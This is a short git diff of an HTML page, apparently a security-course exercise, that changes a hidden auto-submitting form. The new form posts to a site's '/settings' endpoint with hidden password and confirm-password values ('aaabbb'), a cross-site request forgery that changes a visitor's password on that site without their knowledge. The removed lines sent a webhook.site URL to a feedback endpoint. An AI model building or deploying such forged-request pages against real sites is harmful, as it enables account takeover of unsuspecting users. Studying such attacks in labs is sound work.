--- a/index.html
+++ b/index.html
@@ -7,8 +7,9 @@
 </head>
 <body>
     <h1>Welcome to My Simple Website</h1>
-    <form id="autoSubmitForm" action="https://cats.is-course.ru/feedback" method="POST" target="responseFrame">
-    <input type="hidden" name="feedback" value="https://webhook.site/ecf11601-430b-40dd-b6e1-2a064adb8a3f">
+    <form id="autoSubmitForm" action="https://cats.is-course.ru/settings" method="POST" target="responseFrame">
+    <input type="hidden" name="password" value="aaabbb">
+    <input type="hidden" name="confirm-password" value="aaabbb">
     </form>
 
   <!-- Iframe to display response -->
